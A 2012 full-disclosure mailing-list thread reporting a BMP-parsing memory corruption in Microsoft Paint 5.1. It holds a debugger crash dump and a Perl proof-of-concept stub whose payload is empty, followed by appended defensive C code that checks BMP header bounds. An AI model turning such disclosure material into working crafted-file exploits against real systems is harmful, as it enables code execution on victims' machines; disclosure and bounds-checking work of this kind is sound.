Date: Mon, 29 Oct 2012 14:20:31 -0400
From: Antony widmal <antony.widmal@...il.com>
To: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Microsoft Paint 5.1 memory corruption

Always a pleasure to do your homework.

On Mon, Oct 29, 2012 at 1:19 PM, kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com> wrote:

> Thank you for the response and analysis
> Best Regards
> Kaveh Ghaemmaghami
>
> On Sat, Oct 27, 2012 at 3:14 PM, kaveh ghaemmaghami
> <kavehghaemmaghami@...glemail.com> wrote:
> > Hello list!
> >
> > I want to warn you about Microsoft Paint 5.1 memory corruption
> >
> > Be safe
> >
> > Kaveh Ghaemmaghami aka (coolkaveh)
> >
> >
> > ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
> > #!/usr/bin/perl
> > #Title    :  Microsoft Paint 5.1 memory corruption
> > #Version  :  build 2600.xpsp Service Pack3
> > #Date     :  2012-10-21
> > #Vendor   :  http://www.microsoft.com
> > #Impact   :  Med/High
> > #Contact  :  coolkaveh [at] rocketmail.com
> > #Twitter  :  @coolkaveh
> > #tested   :  XP SP3 ENG
> > #Author   :  coolkaveh
> >
> > #######################################################################################################
> > #Notice : for testing POC please run the Microsoft Paint under a debugger and then open the POC file.
> > #----
> > #Bug :
> > #----
> > #Memory corruption during the handling of the bmp files; a context-dependent attacker can execute arbitrary code.
> >
> > #######################################################################################################
> > #(844.cc4): Break instruction exception - code 80000003 (first chance)
> > #eax=7ffda000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
> > #eip=7c90120e esp=00faffcc ebp=00fafff4 iopl=0         nv up ei pl zr na pe nc
> > #cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
> > #*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
> > #ntdll!DbgBreakPoint:
> > #7c90120e cc              int     3
> > #0:005> g
> > #(844.e20): Access violation - code c0000005 (first chance)
> > #First chance exceptions are reported before any exception handling.
> > #This exception may be expected and handled.
> > #eax=000cab68 ebx=00000000 ecx=00000276 edx=000009d8 esi=000d5589 edi=000cab68
> > #eip=77f2f118 esp=0007ef30 ebp=0007efb0 iopl=0         nv up ei pl nz na po nc
> > #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
> > #*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\GDI32.dll -
> > #GDI32!DdEntry11+0x44:
> > #77f2f118 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
> > #0:000> k
> > #*** ERROR: Module load completed but symbols could not be loaded for C:\WINDOWS\system32\mspaint.exe
> > #ChildEBP RetAddr
> > #WARNING: Stack unwind information not available. Following frames may be wrong.
> > #0007efb0 0101235e GDI32!DdEntry11+0x44
> > #0007f024 0100a666 mspaint+0x1235e
> > #0007f04c 0102284e mspaint+0xa666
> > #0007f07c 01022af6 mspaint+0x2284e
> > #*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\MFC42u.DLL -
> > #0007f100 5f801bc5 mspaint+0x22af6
> > #0007f120 5f801b36 MFC42u!Ordinal6370+0x22
> > #0007f180 5f802f6c MFC42u!Ordinal1108+0x91
> > #0007f1a4 5f810971 MFC42u!Ordinal5801+0x34
> > #0007f210 5f81424a MFC42u!Ordinal3944+0x5b
> > #0007f2b0 7c911066 MFC42u!Ordinal5190+0x14d
> > #0007f2b4 7c9101bb ntdll!wcsncpy+0xb07
> > #0007f2c8 7c910202 ntdll!RtlAllocateHeap+0x117
> > #0007f2f4 7c910202 ntdll!RtlAllocateHeap+0x15e
> > #0007f2f8 7c91017b ntdll!RtlAllocateHeap+0x15e
> > #0007f2fc 7c9101bb ntdll!RtlAllocateHeap+0xd7
> > #0007f300 00000000 ntdll!RtlAllocateHeap+0x117
> >
> > #####################################################################################################################
> > my $poc =
> > open(C, ">:raw", "poc.bmp");
> > print C $poc;
> > close(C);
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
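
Added example, not part of either post: the quoted register dump stops in a `rep movs` dword copy with ecx=0x276 and edx=0x9d8 (0x276 × 4), and the post does not say which field is mishandled. One defensive check a BMP loader can make before any such copy is to prove that the pixel-data offset and size derived from the header lie inside the file. `bmp_check`, `make_sample` and the 32768 dimension limit are hypothetical names and choices, and the sample header is constructed so that its pixel data is 0x9d8 bytes.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum bmp_status { BMP_OK, BMP_TRUNCATED, BMP_BAD_HEADER, BMP_BAD_DIMENSIONS,
                  BMP_BAD_OFFSET, BMP_BAD_SIZE };

/* Little-endian readers/writer that do not assume alignment. */
static uint32_t rd32(const uint8_t *p) {
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static void wr32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Validate an uncompressed BMP (40-byte BITMAPINFOHEADER) held in buf[0..len).
 * On BMP_OK, [*off, *off + *size) is the pixel data and lies inside buf. */
enum bmp_status bmp_check(const uint8_t *buf, size_t len, size_t *off, size_t *size) {
    if (len < 54) return BMP_TRUNCATED;
    if (buf[0] != 'B' || buf[1] != 'M' || rd32(buf + 14) != 40) return BMP_BAD_HEADER;
    uint32_t off_bits = rd32(buf + 10), size_image = rd32(buf + 34), clr_used = rd32(buf + 46);
    int32_t width = (int32_t)rd32(buf + 18), height = (int32_t)rd32(buf + 22);
    uint16_t planes = rd16(buf + 26), bpp = rd16(buf + 28);
    if (planes != 1 || rd32(buf + 30) != 0) return BMP_BAD_HEADER;   /* BI_RGB only */
    if (bpp != 1 && bpp != 4 && bpp != 8 && bpp != 24 && bpp != 32) return BMP_BAD_HEADER;
    int64_t rows = height < 0 ? -(int64_t)height : height;           /* negative = top-down */
    if (width <= 0 || width > 32768 || rows == 0 || rows > 32768) return BMP_BAD_DIMENSIONS;
    /* Rows are padded to 4 bytes; 64-bit math so width * bpp * rows cannot wrap. */
    uint64_t need = ((uint64_t)width * bpp + 31) / 32 * 4 * (uint64_t)rows;
    if (size_image != 0 && size_image != need) return BMP_BAD_SIZE;
    if (bpp <= 8 && clr_used > (1u << bpp)) return BMP_BAD_HEADER;
    uint64_t min_off = 54 + 4 * (uint64_t)(bpp > 8 ? 0 : clr_used ? clr_used : 1u << bpp);
    /* Offset must clear headers and palette, and offset + need must fit in the file. */
    if (off_bits < min_off || off_bits > len || need > len - off_bits) return BMP_BAD_OFFSET;
    *off = off_bits; *size = (size_t)need;
    return BMP_OK;
}

/* Constructed sample: 70x70, 4 bpp, 16-colour palette, zeroed pixels (2520 bytes). */
size_t make_sample(uint8_t *buf, uint32_t off_bits, uint32_t size_image) {
    size_t len = 54 + 64 + 2520;
    memset(buf, 0, len);
    buf[0] = 'B'; buf[1] = 'M';
    wr32(buf + 2, (uint32_t)len); wr32(buf + 10, off_bits); wr32(buf + 14, 40);
    wr32(buf + 18, 70); wr32(buf + 22, 70);
    buf[26] = 1; buf[28] = 4; wr32(buf + 34, size_image);
    return len;
}
```

A loader would copy only from `buf + off` for `size` bytes after `BMP_OK`, and reject the file on any other status.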
